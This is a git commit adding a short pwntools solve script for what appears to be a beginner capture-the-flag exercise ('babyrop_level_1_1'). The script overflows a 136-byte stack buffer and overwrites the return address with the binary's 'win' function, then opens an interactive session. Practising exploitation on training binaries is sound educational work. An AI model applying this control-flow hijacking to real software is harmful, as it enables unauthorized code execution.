solve script

This commit is contained in:
jc
2025-08-05 18:16:27 +03:00
parent 40c7bc25ee
commit 153fd786b8
+16
View File
@@ -0,0 +1,16 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./babyrop_level_1_1", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*136
buf += p64(target.sym.win)
s(buf)
r.interactive()